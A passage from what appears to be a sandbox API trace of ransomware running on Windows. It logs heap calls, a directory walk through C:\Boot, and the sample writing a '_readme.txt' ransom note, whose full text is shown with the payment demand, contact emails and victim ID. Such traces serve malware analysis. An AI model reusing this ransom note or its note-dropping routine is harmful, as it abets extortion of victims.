Size=0x20) returned 0x2e837c8 [0184.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.760] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0184.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.760] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.760] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.760] PathFindFileNameW (pszPath="") returned="" [0184.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.760] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.761] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0184.761] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0184.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.761] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.761] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0184.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.762] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0184.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.762] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.762] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.762] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.764] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*" (normalized: "c:\\boot\\zh-tw\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.765] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.765] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.765] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.765] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.766] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0184.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.769] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0184.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.773] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0184.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.775] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0184.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0184.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 